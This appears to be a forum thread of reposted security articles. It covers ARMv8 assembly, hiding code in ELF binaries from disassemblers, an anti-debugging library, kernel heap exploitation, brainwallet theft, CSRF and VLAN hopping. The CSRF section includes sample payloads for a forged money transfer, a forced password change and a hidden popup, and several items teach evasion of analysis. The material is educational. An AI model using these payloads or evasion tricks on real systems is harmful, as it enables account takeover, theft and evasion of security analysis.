(I don’t debate) [h=3]What instructions are not present compared to AArch32:[/h] Conditional execution operations, cause of: The A64 instruction set does not include the concept of predicated or conditional execution. Benchmarking shows that modern branch predictors work well enough that predicated execution of instructions does not offer sufficient benefit to justify its significant use of opcode space, and its implementation cost in advanced implementations. [source] Load Multiple. instructions load from memory a subset, or possibly all, of the general-purpose registers and the PC, so there aren’t: push, pop, ldmia, ecc… : these are be replace by load/store pair. Coprocessor instructions [h=3]Branches & Exception[/h] Conditional branch Conditional branches change the flow of execution depending on the current state of the condition flags or the value in a general-purpose register. [TABLE] [TR] [TD]B<cond>[/TD] [TD]Branch conditionally[/TD] [TD]B.<cond> <label>[/TD] [/TR] [TR] [TD]CBNZ[/TD] [TD]Compare and branch if nonzero[/TD] [TD]CBNZ <Wt|Xt>, <label>[/TD] [/TR] [TR] [TD]CBZ[/TD] [TD]Compare and branch if zero[/TD] [TD]CBZ <Xt>, <label>[/TD] [/TR] [/TABLE] Unconditional branch [TABLE] [TR] [TD]B[/TD] [TD]Branch unconditionally[/TD] [TD]B <label>[/TD] [/TR] [TR] [TD]BL[/TD] [TD]Branch with link[/TD] [TD]BL <label>[/TD] [/TR] [/TABLE] The BL instruction(s) writes the address of the sequentially following instruction, for the return (see RET), to general-purpose register, X30. Unconditional branch (register) [TABLE] [TR] [TD]BLR[/TD] [TD]Branch with link to register[/TD] [TD]BLR <Xn>[/TD] [/TR] [TR] [TD]BR[/TD] [TD]Branch to register[/TD] [TD]BR <Xn>[/TD] [/TR] [TR] [TD]RET[/TD] [TD]Return from subroutine:[/TD] [TD]RET {<Xn>}; where Xn register holding the address to be branched to. Defaults to X30 if absent.[/TD] [/TR] [/TABLE] Exception generating HVC Generate exception targeting Exception level 2 SMC Generate exception targeting Exception level 3 SVC Instruction Generate exception targeting Exception level 1 Others instrunctions NOP: No OPeration WFE Wait for event WFI Wait for interrupt SEV Send event SEVL Send event local [h=3]Load/Store register[/h] There’re many instructions in this class to move many data size: byte, halfword and word, but I show only four, just to make you understand them : two for move single register and two for move a pair of registers; but first I have to describe how we can access to memory. [h=4]Load/Store addressing modes[/h] This part is very important to understand different ARM addressing modes; the most used are three: [base{, #imm}]: Base plus offset addressing means that the address is the value in the 64-bit base register plus an offset. Example: ldrsw x0, [x29,76] #load signed word in x0 [*][base, #imm]! : Pre-indexed addressing means that the address is the sum of the value in the 64-bit base register and an offset, and the address is then writtenback to the base register. Example: stp x29, x30, [sp, -80]! #store x9 e x30 into stack from sp-80 [*][base], #imm : Post-indexed addressing means that the address is the value in the 64-bit base register, and the sum of the address and the offset is then written back to the base register. Example: ldp x29, x30, [sp], 80 #load values from stack now I can describe load/store instructions, don’t care addressing mode, I show you only few example. 
Single Register
Load or store a single register.
ldr: Load register, which works with:
Register offset: LDR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}]
Immediate offset: LDR <Xt>, [<Xn|SP>], #<simm>
PC-relative literal: LDR <Xt>, <label>
str: Store register:
Register offset: STR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}]
Immediate offset: STR <Xt>, [<Xn|SP>], #<simm>
<simm> is a signed immediate byte offset, in the range -256 to 255.
Pair of Registers
Load or store the two specified registers at the memory address given by Xn or SP.
ldp, load pair: LDP <Xt1>, <Xt2>, [<Xn|SP>], #<imm>
stp, store pair: STP <Xt1>, <Xt2>, [<Xn|SP>], #<imm>
<imm> is a signed immediate byte offset, a multiple of 8 in the range -512 to 504.
[h=3]Data processing – immediate[/h]
Arithmetic (immediate)
[TABLE]
[TR] [TD]ADD[/TD] [TD]ADD (immediate)[/TD] [TD]ADD <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn + shift(imm)[/TD] [/TR]
[TR] [TD]ADDS[/TD] [TD]Add and set flags[/TD] [TD][/TD] [/TR]
[TR] [TD]SUB[/TD] [TD]Subtract[/TD] [TD]SUB <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn – shift(imm)[/TD] [/TR]
[TR] [TD]SUBS[/TD] [TD]Subtract and set flags[/TD] [TD][/TD] [/TR]
[TR] [TD]CMP[/TD] [TD]Compare[/TD] [TD]CMP <Xn|SP>, #<imm>{, <shift>}[/TD] [/TR]
[TR] [TD]CMN[/TD] [TD]Compare negative[/TD] [TD][/TD] [/TR]
[/TABLE]
Where: <shift> is the optional shift type applied to the second source operand, defaulting to LSL. The shift operators LSL (logical shift left), ASR (arithmetic shift right) and LSR (logical shift right) accept an immediate shift <amount> in the range 0 to one less than the register width of the instruction, inclusive.
Logical
[TABLE]
[TR] [TD]AND[/TD] [TD]Bitwise AND[/TD] [TD]AND <Xd|SP>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR]
[TR] [TD]ANDS[/TD] [TD]Bitwise AND and set flags[/TD] [TD]ANDS <Xd>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR]
[TR] [TD]EOR[/TD] [TD]Bitwise exclusive OR[/TD] [TD]EOR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn EOR imm[/TD] [/TR]
[TR] [TD]ORR[/TD] [TD]Bitwise inclusive OR[/TD] [TD]ORR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn OR imm[/TD] [/TR]
[TR] [TD]TST[/TD] [TD]Test bits[/TD] [TD]TST <Xn>, #<imm> ;Rn AND imm[/TD] [/TR]
[/TABLE]
Move
Instructions to move a wide (16-bit) immediate:
[TABLE]
[TR] [TD]MOVZ[/TD] [TD]Move wide with zero[/TD] [TD]MOVZ <Xd>, #<imm>{, LSL #<shift>} ;Rd = LSL (imm16, shift)[/TD] [/TR]
[TR] [TD]MOVN[/TD] [TD]Move wide with NOT[/TD] [TD]MOVN <Xd>, #<imm>{, LSL #<shift>} ;Rd = NOT (LSL (imm16, shift))[/TD] [/TR]
[TR] [TD]MOVK[/TD] [TD]Move 16-bit immediate into register, keeping other bits unchanged[/TD] [TD]MOVK <Xd>, #<imm>{, LSL #<shift>} ;Rd<shift+15:shift> = imm16[/TD] [/TR]
[/TABLE]
There is also an instruction to move an immediate: MOV <Xd>, #<imm> ;Rd = imm. Its three variants are aliases of MOVZ, MOVN and MOVK; a sketch of building a 64-bit constant this way follows below.
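For instance, this hand-written sketch (not from the article) builds the 64-bit constant 0x1122334455667788 in x0 sixteen bits at a time:

    movz x0, #0x1122, lsl #48   // x0 = 0x1122000000000000, all other bits zeroed
    movk x0, #0x3344, lsl #32   // keep the rest, patch bits 47:32
    movk x0, #0x5566, lsl #16   // patch bits 31:16
    movk x0, #0x7788            // patch bits 15:0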
PC-relative address calculation
The ADR instruction adds a signed, 21-bit immediate to the value of the program counter that fetched this instruction, and then writes the result to a general-purpose register: ADR <Xd>, <label>
The ADRP instruction permits the calculation of the address of a 4KB-aligned memory region. In conjunction with an ADD (immediate) instruction, or a Load/Store instruction with a 12-bit immediate offset, this allows for the calculation of, or access to, any address within ±4GB of the current PC: ADRP <Xd>, <label>
Shift
[TABLE]
[TR] [TD]ASR[/TD] [TD]Arithmetic shift right[/TD] [TD]ASR <Xd>, <Xn>, #<bits to shift>[/TD] [/TR]
[TR] [TD]LSL[/TD] [TD]Logical shift left[/TD] [TD]LSL <Xd>, <Xn>, #<shift>[/TD] [/TR]
[TR] [TD]LSR[/TD] [TD]Logical shift right[/TD] [TD]LSR <Xd>, <Xn>, #<shift>[/TD] [/TR]
[TR] [TD]ROR[/TD] [TD]Rotate right[/TD] [TD]ROR <Xd>, <Xs>, #<bits to shift>[/TD] [/TR]
[/TABLE]
[h=3]Data processing – register[/h]
Arithmetic (shifted register)
ADD: Add
ADDS: Add and set the condition flags
SUB: Subtract
SUBS: Subtract and set flags
CMN: Compare negative
CMP: Compare
NEG: Negate ;Rd = 0 – shift(Rm, amount)
NEGS: Negate and set flags
How ADD works (the others are similar): ADD <Xd>, <Xn>, <Xm>{, <shift> #<amount>} ;Rd = Rn + shift(Rm, amount)
There are also the arithmetic-with-carry instructions, which accept two source registers, take the carry flag as an additional input to the calculation, and do not support a shift:
ADC: Add with carry ADC <Xd>, <Xn>, <Xm>
ADCS: Add with carry and set flags ADCS <Xd>, <Xn>, <Xm> ;Rd = Rn + Rm + C
SBC: Subtract with carry SBC <Xd>, <Xn>, <Xm> ;Rd = Rn – Rm – 1 + C
SBCS: Subtract with carry and set flags
NGC: Negate with carry NGC <Xd>, <Xm> ;Rd = 0 – Rm – 1 + C
NGCS: Negate with carry and set flags
Logical (shifted register)
AND: Bitwise AND
ANDS: Bitwise AND and set flags
BIC: Bitwise bit clear ;Rd = Rn AND NOT shift(Rm, amount)
BICS: Bitwise bit clear and set flags
EON: Bitwise exclusive OR NOT ;Rd = Rn EOR NOT shift(Rm, amount)
EOR: Bitwise exclusive OR ;Rd = Rn EOR shift(Rm, amount)
ORR: Bitwise inclusive OR
MVN: Bitwise NOT ;Rd = NOT shift(Rm, amount)
ORN: Bitwise inclusive OR NOT ;Rd = Rn OR NOT shift(Rm, amount)
TST: Test bits ;Rn AND shift(Rm, amount)
How they work: AND <Xd>, <Xn>, <Xm>{, <shift> #<amount>} ;Rd = Rn AND shift(Rm, amount)
Here <shift> supports the default shift operators plus ROR (rotate right).
Multiply and divide
MADD Multiply-add MADD <Xd>, <Xn>, <Xm>, <Xa> ;Rd = Ra + Rn * Rm
MSUB Multiply-subtract
MNEG Multiply-negate
MUL Multiply MUL <Xd>, <Xn>, <Xm> ;Rd = Rn * Rm
SMADDL Signed multiply-add long
SMSUBL Signed multiply-subtract long
SMNEGL Signed multiply-negate long
SMULL Signed multiply long
SMULH Signed multiply high
UMADDL Unsigned multiply-add long
UMSUBL Unsigned multiply-subtract long
UMNEGL Unsigned multiply-negate long
UMULL Unsigned multiply long
UMULH Unsigned multiply high
SDIV Signed divide SDIV <Xd>, <Xn>, <Xm> ;Rd = Rn / Rm
UDIV Unsigned divide
Move
The Move (register) instructions are aliases for other data processing instructions. They copy a value from a general-purpose register to another general-purpose register or the current stack pointer, or from the current stack pointer to a general-purpose register: MOV <Xd>, <Xm> ;Xd = Xm
Shift (register)
ASRV: Arithmetic shift right variable
LSLV: Logical shift left variable
LSRV: Logical shift right variable
RORV: Rotate right variable
An example: ASRV <Xd>, <Xn>, <Xm> ;Rd = ASR(Rn, Rm)
There are alias instructions without the trailing V.
CRC32
The optional CRC32 instructions operate on the general-purpose register file to update a 32-bit CRC value from an input value comprising 1, 2, 4, or 8 bytes. There are two different classes of CRC instructions, CRC32 and CRC32C, that support two commonly used 32-bit polynomials, known as CRC-32 and CRC-32C. A small usage sketch follows.
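A hedged sketch of my own (assuming the optional CRC extension is implemented): folding one 64-bit word into a running CRC-32C held in w0:

    mvn w0, wzr           // start value 0xFFFFFFFF (bitwise NOT of the zero register)
    crc32cx w0, w0, x1    // fold the 8 data bytes in x1 into the CRC-32C
    mvn w0, w0            // final inversion of the accumulated CRC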
Conditional select
The Conditional select instructions select between the first or second source register, depending on the current state of the condition flags.
[TABLE]
[TR] [TD]CSEL[/TD] [TD]Conditional select[/TD] [TD]CSEL <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else Rm[/TD] [/TR]
[TR] [TD]CSINC[/TD] [TD]Conditional select increment[/TD] [TD]CSINC <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else (Rm + 1)[/TD] [/TR]
[TR] [TD]CSINV[/TD] [TD]Conditional select inversion[/TD] [TD]CSINV <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else NOT (Rm)[/TD] [/TR]
[TR] [TD]CSNEG[/TD] [TD]Conditional select negation[/TD] [TD]CSNEG <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else -Rm[/TD] [/TR]
[TR] [TD]CSET[/TD] [TD]Conditional set[/TD] [TD]CSET <Xd>, <cond> ;Rd = if cond then 1 else 0[/TD] [/TR]
[TR] [TD]CSETM[/TD] [TD]Conditional set mask[/TD] [TD]CSETM <Xd>, <cond> ;Rd = if cond then -1 else 0[/TD] [/TR]
[TR] [TD]CINC[/TD] [TD]Conditional increment[/TD] [TD]CINC <Xd>, <Xn>, <cond> ;Rd = if cond then Rn+1 else Rn[/TD] [/TR]
[TR] [TD]CINV[/TD] [TD]Conditional invert[/TD] [TD]CINV <Xd>, <Xn>, <cond> ;Rd = if cond then NOT(Rn) else Rn[/TD] [/TR]
[TR] [TD]CNEG[/TD] [TD]Conditional negate[/TD] [TD]CNEG <Xd>, <Xn>, <cond> ;Rd = if cond then -Rn else Rn[/TD] [/TR]
[/TABLE]
Conditional comparison
The Conditional comparison instructions provide a conditional select for the NZCV condition flags, setting the flags to the result of an arithmetic comparison of the two source register values if the named input condition is true, or to an immediate value if the input condition is false. There are register and immediate forms. The immediate form compares the source register to a small 5-bit unsigned value.
[TABLE]
[TR] [TD]CCMN[/TD] [TD]Conditional compare negative (register)[/TD] [TD]CCMN <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, -Rm) else #nzcv[/TD] [/TR]
[TR] [TD]CCMN[/TD] [TD]Conditional compare negative (immediate)[/TD] [TD]CCMN <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #-imm) else #nzcv[/TD] [/TR]
[TR] [TD]CCMP[/TD] [TD]Conditional compare (register)[/TD] [TD]CCMP <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, Rm) else #nzcv[/TD] [/TR]
[TR] [TD]CCMP[/TD] [TD]Conditional compare (immediate)[/TD] [TD]CCMP <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #imm) else #nzcv[/TD] [/TR]
[/TABLE]
Where: <nzcv> is the flag bit specifier, an immediate in the range 0 to 15, giving the alternative state for the 4-bit NZCV condition flags, encoded in the nzcv field. <imm> is a five-bit unsigned (positive) immediate encoded in the imm5 field.
How ccmp works: it checks the NZCV flags against <cond>; if the previous comparison passed, it performs this comparison and sets NZCV accordingly, otherwise it sets NZCV to the #<nzcv> immediate. If we have to write the expression x0 >= x1 && x2 == x3 in ARM assembly, with ccmp we can do this:
cmp x0, x1
ccmp x2, x3, #0, ge
b.eq good
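Conditional select composes with cmp in the same way; here is a minimal hand-written sketch (not the article's) of a branchless signed max():

    cmp x0, x1            // set the flags from x0 - x1
    csel x0, x0, x1, gt   // x0 = (x0 > x1) ? x0 : x1, no branch needed
    ret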
#include "stdio.h" static int v[] = {1,2,3,4,5,6,7,8,9,10}; void print(int i); int add(int v, int t); int main() { int i; int array[10]; for(i=0; i < 10; i++) array = v * (add(i,5)); return 0; } int add(int v, int t) { return v + t; } Now this is the asm code generated by GCC, you need to download Linaro GCC to code on ARMv8: .cpu generic+fp+simd .data .align 3 .type v, %object .size v, 40 ;v array v: .word 1 .word 2 .word 3 .word 4 .word 5 .word 6 .word 7 .word 8 .word 9 .word 10 ;dump: 0000000000410918 : 410918: 00000001 .word 0x00000001 41091c: 00000002 .word 0x00000002 410920: 00000003 .word 0x00000003 410924: 00000004 .word 0x00000004 410928: 00000005 .word 0x00000005 41092c: 00000006 .word 0x00000006 410930: 00000007 .word 0x00000007 410934: 00000008 .word 0x00000008 410938: 00000009 .word 0x00000009 41093c: 0000000a .word 0x0000000a ; end dump .text .align 2 .global main .type main, %function main: stp x29, x30, [sp, -80]! ;save register into sp-80 and sp-88, and free memory for array ;remember the Pre-indexed addressing add x29, sp, 0 ; frame pointer = stack pointer str x19, [sp,16] ;store r19 - remember Base plus offset ;first loop str wzr, [x29,76] ;i=0 -> wzr: zero register b .L2 ;branch to label .L3: adrp x0, v ;calc label address --> dump: adrp x0, 410000 add x1, x0, :lo12:v ; --> dump: add x1, x0, #0x918 see above 0x410918 dump ldrsw x0, [x29,76] ;load signed word (i variable) lsl x0, x0, 2 ;logical shift left (as mult for 2^2), it need to calc i-offset add x0, x1, x0 ldr w19, [x0] ; w19 = v[i] ldr w0, [x29,76] ;remember [x29,76] is i ;remeber w0 is paramer register mov w1, 5 ;w1 is a param register bl add ;call add(w0, w1) mul w1, w19, w0 ;w0 after a bl has result value ;w1 = v[i] * add(w0,w1) add x2, x29, 32 ;array base address: FP+32 ldrsw x0, [x29,76] ;load i variable lsl x0, x0, 2 ;calc the add x0, x2, x0 ;array[i] offset as for v[i] str w1, [x0] ;save w1 into x0 address ldr w0, [x29,76] add w0, w0, 1 ; i += 1 str w0, [x29,76] .L2: ldr w0, [x29,76] cmp w0, 9 ble .L3 ; if i <= 9 re-start loop ;end of first for cicle mov w0, 0 ;w0 is the result register in this case ldr x19, [sp,16] ;re-load old x19 value ldp x29, x30, [sp], 80 ;re-load old frame pointer and return address .size main, .-main .section .rodata .align 2 .global add .type add, %function add: ;start of generic prologue sub sp, sp, #16 ;free memory for 2 register str w0, [sp,12] ; save the first param str w1, [sp,8] ;save the second param ;end of prologue ;code ldr w1, [sp,12] ;load the first param ldr w0, [sp,8] ;load second param add w0, w1, w0 ;w0 has the result value ;epilogue add sp, sp, 16 ;free the stack ret ;return to address in x30 .size add, .-add To run this code, you can use ARM Foundation Model (it’s free) how you see here: the Hello World in ARMv8 Sursa: Introduction to ARMv8 64-bit Architecture
9. [h=1]Hiding code in ELF binary[/h]
Written by aaSSfxxx - 11 december 2013

Since I'm contributing to radare2, I'm learning how a disassembler works, and especially how ELF files are handled by disassemblers. I saw that almost every disassembler relies on the ELF section headers (generally located at the end of the file), which are never actually used (by the Linux kernel or glibc), because the ELF's mapping in memory is given by the program header (another ELF structure, which I described in my article about ELF packers). So, we can easily hide code from disassemblers by manipulating the address fields of the ".text" section structure.
I'll use a hexadecimal editor and the latest git revision of radare2 (which fixes a bug related to virtual address calculation in ELF binaries), so I recommend you have those tools installed on your computer before continuing with this article.
[h=2]The trick[/h]
First, let's start with the following code:

#include <stdio.h>
int main()
{
    printf("You will never see me !\n");
    return 0;
}
int foo()
{
    return 1;
}

The goal of this article is to make disassemblers believe that the entrypoint of the binary is the "foo" function (and not the _start function added by gcc). First, let's compile the source code to work on the generated executable. Then we need to grab the offset of the "foo" symbol, by doing
Code BASH : rabin2 -s a.out | grep foo
and note the offset of the symbol somewhere. Then we'll strip all symbols of the binary (to avoid corrupted disassembly in IDA) using the "strip" command on our binary.
Then we need to retrieve the section header table offset in the binary, which is located at offset 0x20 of the file (for 32-bit executables; I don't have a 64-bit system yet, so please tell me if it still works). Then we use radare2 (and the tool rabin2) to get the index of the .text section we'll spoof within the section array. So we execute
Code BASH : rabin2 -S a.out | grep .text
and note the "idx" field somewhere. To find the section we just need to calculate
Code PSEUDO : section_offset + (idx+1)*0x28
0x28 is the size of a section header entry, and we need to add 1 to the idx we got from radare2 because it seems to ignore the null section at the beginning.
Then go to the offset calculated above and modify the "sh_offset" field of the Elf_Shdr structure (at offset 0x10 relative to the beginning of the structure). Don't forget that we work in little endian (x86) when editing the binary in a hex editor!
Then save the program and execute it (it should still show "You will never see me !"); when you try to disassemble it, you will see the disassembly of the foo function as the entry point! If you'd rather script the patch than use a hex editor, see the sketch below.
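This is a minimal C sketch of my own (not the author's procedure, which used a hex editor). IDX and NEW_OFFSET are hypothetical values standing in for the "idx" reported by rabin2 -S and the spoofed file offset you want .text to claim:

#include <stdio.h>
#include <stdint.h>

#define IDX        10       /* hypothetical: the .text idx printed by rabin2 -S */
#define NEW_OFFSET 0x5c4    /* hypothetical: the spoofed sh_offset value        */

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <elf32>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "r+b");
    if (!f) { perror("fopen"); return 1; }

    uint32_t e_shoff = 0;
    fseek(f, 0x20, SEEK_SET);                /* e_shoff lives at offset 0x20 in a 32-bit ELF header */
    if (fread(&e_shoff, 4, 1, f) != 1) { perror("fread"); return 1; }

    /* skip the null section (hence idx+1); 0x28 is the size of one Elf32_Shdr */
    long shdr = (long)e_shoff + (IDX + 1) * 0x28;

    uint32_t new_off = NEW_OFFSET;
    fseek(f, shdr + 0x10, SEEK_SET);         /* sh_offset sits at offset 0x10 inside the Elf32_Shdr */
    fwrite(&new_off, 4, 1, f);               /* an x86 host writes little-endian, as the trick requires */

    fclose(f);
    return 0;
}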
[h=2]What happened and how to detect it ?[/h]
As I said in the introduction, the kernel relies on the program header table (which generally follows the ELF header) and maps the PT_LOAD program headers into memory (see the articles on ELF packers I wrote). So, section headers are totally optional in ELF binaries, and are just metadata, since everything dynamic linkers need to know is stored in program headers of type PT_DYNAMIC. So we can easily spoof almost any section header without impact on a program's execution, but disassemblers (even IDA) will be fooled and will produce incoherent disassembly, because they rely on section headers, which are not reliable.
Anyway, there are some ways to detect it. In most binaries generated by compilers, the virtual address usually has the same last digits as the file offset. For example, 0x08048130 will match offset 0x130 in the file, or 0x0804956 can match offset 0x156. But with this manipulation we can see that the offsets don't match the virtual addresses at all, which can indicate that the binary was modified.
Another way to handle it is to erase the section header offset and size in the ELF header, which will force disassemblers (IDA and radare2, for instance) to rely on program headers for disassembly, or to try to fix the section headers manually.
Sursa: Hiding code in ELF binary - aaSSfxxx's blog
10. Update (03-12-2014): This tool is no longer endorsed by MorXploit as the author is no longer part of the team.
Description: MorXAntiRE is a library that collects anti-debugger/disassembly/dump/VM/sandbox tricks. MorXAntiRE is licensed under GNU/GPL version 3 and developed in C using Visual Studio 2012 and inline assembly.
Anti-Debugging:
IsDebuggerPresentAPI
IsDebuggerPresentPEB
CheckRemoteDebuggerPresentAPI
NtQueryInformationProcess (ProcessDbgPort)
NtQueryInformationProcess (ProcessDebugFlags)
NtQueryInformationProcess (ProcessDebugObject)
NtGlobalFlag
NtSetInformationThread (HideThreadFromDebugger)
Open Process
Parent Process
Self-Debug (CreateProcess)
UnhandledExceptionFilter
NtQueryObject
Debugger Attacks:
BlockInputAPI
OutputDebugString
Timing Attacks:
RDTSC
Win32Timing (GetTickCount)
Anti-Breakpoint:
0xCC BP detection
Memory Breakpoint Debugger Check (Guard Pages)
Hardware Breakpoint Check (Debug registers with Get/SetThreadContext)
Hardware Breakpoint Check (Debug registers with Structured Exception Handling)
Author: Ayoub Faouzi <noteworthy_at_morxploit_dot_com>
Version: MorXAntiRE v1.5
MD5: 372271696bf4a5aab6b5a4a3cf7ae794
Requirements: Windows 32bits
Download: Link 1
Sursa: MorXAntiRE Anti reverse code engineering and dynamic analysis tool | MorXploit Research
11. Exploiting Linux kernel heap corruptions (SLUB Allocator)
Author: Simo Ghannam <mg_at_morxploit_dot_com>
Date: October 2013
MorXploit Research
1. Introduction: In recent years, a lot of research has been done on Linux kernel security. The most common kernel privilege vulnerabilities can be divided into several categories: NULL pointer dereference, kernel-space stack overflow, kernel slab overflow, race conditions, etc. Some of them are pretty easy to exploit, with no need to prepare your own Linux kernel debugging environment to write the exploit, while others require special knowledge of Linux kernel design, routines, memory management, etc. In this tutorial we will explain how the SLUB allocator works and how we can get our user-land code executed when we can corrupt some metadata of a slab allocator.
Download: http://www.morxploit.com/morxpapers/kernel_exploit_tut.pdf
12. Smashing Bitcoin BrainWallets, for fun and profit!
Author: Simo Ben youssef
Contact: simo@morxploit.com
Published: 29 January 2014
MorXploit Research
Audience: IT security professionals/Bitcoin users
Introduction: Have you ever created one of those "brainwallets", then gone to check your wallet balance the next day and found it all gone? Most likely that's because you used a dictionary-based passphrase, and someone generated your private key based on it and imported your wallet. Attackers these days generate trillions of dictionary-based private keys and import them, resulting in the theft of other people's Bitcoins. This paper will explain how such an attack can be achieved.
Download: http://www.morxploit.com/morxpapers/smashingbitcoins.pdf
13. Title: Understanding Cross Site Request Forgery
Author: Simo Ben youssef
Contact: simo_at_morxploit_dot_com
Published: 30 January 2013
MorXploit Research
http://www.morxploit.com
Audience: IT security professionals / Web administrators / Regular web users
Introduction: Cross Site Request Forgery, also known as XSRF and abbreviated as CSRF, is a type of 'one click' attack where malicious code is used to exploit a victim's online account by automatically sending unauthorized instructions through the victim's browser to a vulnerable website, making changes based on the attacker's aim and the impact of the vulnerability.
Examples: The attack works by making a target user click on a link which points to the attacker's malicious code; the code then sends commands to the vulnerable website, which thinks the request was willingly sent by the authenticated victim and processes the changes. An example could be a request to change a password: a vulnerable website will not ask you to confirm the change by submitting your current password, and will not use some other form of verification such as token IDs, which leads to your password being changed without your permission and therefore gives the attacker complete access to your account.
The process involves three steps:
1- The victim clicks on a malicious link.
2- The link automatically requests changes to be made within the vulnerable site as defined by the attacker.
3- The website processes the change because it relies solely on the user authentication cookie.
Limitations: For the attack to succeed, assuming that the attacker has successfully coded the exploit, 3 requirements must be met:
1- The target website must be vulnerable to CSRF.
2- The victim must click on a link.
3- The victim must be authenticated.
Severity: According to the United States Department Of Homeland Security, the CSRF vulnerability ranks in at the 909th most dangerous software bug ever found; CSRF can be used to change a victim's password, post data on the victim's behalf or even execute code remotely, resulting in data compromise.
Technical exploitation: In order to exploit CSRF, the attacker must have access to the same private area that the victim uses, then analyze the vulnerable HTML code. The attacker needs to determine the form input names when the HTTP POST method is used, or the variable names when HTTP GET is used instead, which is very rare.
The GET request can be easily exploited by using the 'img' tag to perform the malicious request. For example, the attacker can include the following hidden link on his target page:
<img src="http://vulnerablebank/quickpay?senderaccount=victim&receiveraccount=attacker&amount=1000">
which will send the specified amount of money to the attacker's account.
The POST request, which is the most common form used, is a little bit tricky and can be visually detected. The reason is that there is no way a form can be posted 'silently' using just HTML. The only way to do that is through AJAX, but luckily, due to AJAX security restrictions, this is not exploitable, because AJAX will not send your authentication cookie from a domain name other than the target domain itself. The only way left is using JavaScript, which can automatically submit a form using the onload attribute within the body tag.
An example of a form that automatically attempts to change a user's password could be:
<html>
<body onload="document.xploitform.submit();">
<form name="xploitform" method="post" action="http://www.somevulnerablesite/changepassword">
<input type="hidden" name="newpassword" value='hacked'>
<input type="hidden" name="confirmpassword" value='hacked'>
</form></body>
</html>
To make this more interesting, the attacker can open the form's link as a small pop-up window from another page while displaying a picture or other content to grab the victim's attention; in this particular case the attack is a combination of both CSRF and social engineering. The following code can be used to perform that:
<center><img src="http://www.morxploit.com/images/logo.png"></center>
<body onload="window.open('http://attackersite.com/linktothepreviousform.html','myWin','scrollbars=no,width=1,height=1,left=2000,top=2000');">
which will display an image in the center of the page and pop up the form as a small window placed in the corner of the page.
Prevention:
1- Website side:
* Requiring the use of the user's current password when requesting changes.
* Implementing the use of user's hidden token IDs (a sketch of this follows below).
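To illustrate the token-ID idea, here is a minimal sketch of my own (not from the paper): the server embeds a random per-session value in every sensitive form and rejects any POST whose token does not match the one stored for that session. The field name csrf_token and its value are hypothetical:

<form name="changepassword" method="post" action="http://www.somevulnerablesite/changepassword">
<input type="hidden" name="csrf_token" value="a3f8c1e92b774d05">
<input type="password" name="newpassword">
<input type="password" name="confirmpassword">
<input type="submit" value="Change password">
</form>

Since the attacker's page cannot read this value (the same-origin policy blocks it, just like the AJAX restriction described above), a forged request arrives without a valid token and fails.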
2- User side:
* Avoid opening external links using the same authenticated browser; use a different unauthenticated browser instead, or if you are using Google Chrome, hit Shift + CTRL + N to go into incognito mode.
* Experienced users can use a data monitoring tool such as the Firefox plugin Tamper Data to verify any data sent by the browser.
Conclusion: CSRF attacks are dangerous and can result in data compromise when successfully exploited; it's both the website's and the user's responsibility to prevent them. The Internet has enormous security resources; web developers and website admins have no excuse not to learn basic security in order to protect their customers, and meanwhile users should use some common sense and stop blindly clicking on links.
Author disclaimer: The information contained in this entire document is for educational and demonstration purposes only. Modifying, using or publishing this information is entirely at your own risk; I cannot be held responsible for any malicious use.
Sursa: http://www.morxploit.com/csrf.txt

14. Understanding VLAN Hopping Attacks
By Aaron
I often receive questions from CCNP candidates about which preventative measures can mitigate a VLAN hopping attack. The confusion stems from the fact that different sources (including the official certification guide from Cisco Press) often only address one of the attack types. Different language is also frequently used to describe the same attack vector, only adding to the confusion. Here's my attempt to explain the two primary VLAN hopping attack types and how each works.
VLAN hopping describes when an attacker connects to a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two VLAN hopping exploit methods: switch spoofing and double tagging.
Switch Spoofing
Switch spoofing can occur when the switch port an attacker connects to is either in trunking mode or in DTP auto-negotiation mode, both of which allow devices that use 802.1q encapsulation to tag traffic with different VLAN identifiers. An attacker adds 802.1q encapsulation headers with VLAN tags for remote VLANs to its outgoing frames. The receiving switch interprets those frames as sourced from another 802.1q switch (only switches usually use 802.1q encapsulation, after all) and forwards the frames into the appropriate VLAN.
Switch Spoofing Mitigation
The two preventive measures against switch spoofing attacks are [1] to set edge ports to static access mode and [2] to disable DTP auto-negotiation on all ports. The switchport mode access command forces the port to act as an access port, disabling any chance that it could become a trunk port and send traffic for multiple VLANs. Manually disabling Dynamic Trunking Protocol (DTP) on all ports prevents access ports configured as dynamic from forming a trunk relationship with a potential attacker.
Switch(config-if)# switchport mode access
Switch(config-if)# switchport nonegotiate
Double Tagging
A double tagging attack begins when an attacker connected to a switch port sends a frame with two VLAN tags in the frame header. If the attacker is connected to an access port, the first tag matches it. If the attacker is connected to an 802.1Q trunk port, the first tag matches that of the native VLAN (usually 1). The second tag identifies the VLAN the attacker would like to forward the frame to. When the switch receives the attacker's frames, it removes the first tag. It then forwards the frames out all of its trunk ports to neighbor switches (since they also use the same native VLAN). Because the second tag was never removed after it entered the first switch, the secondary switches receiving the frames see the remaining tag as the VLAN destination and forward the frames to the target port in that VLAN. Notice that this requires that the attack take place at least one switch away from the switch the attacker is physically connected to. Also, the attack requires the use of 802.1Q encapsulation. Since ISL encapsulation does not use a native or unmarked VLAN, trunks running it are not susceptible to double tagging attacks.
Double Tagging Mitigation
The key feature of a double tagging attack is exploiting the native VLAN. Since VLAN 1 is the default VLAN for access ports and the default native VLAN on trunks, it's an easy target. The first countermeasure is to remove access ports from the default VLAN 1, since the attacker's port must match that of the switch's native VLAN.
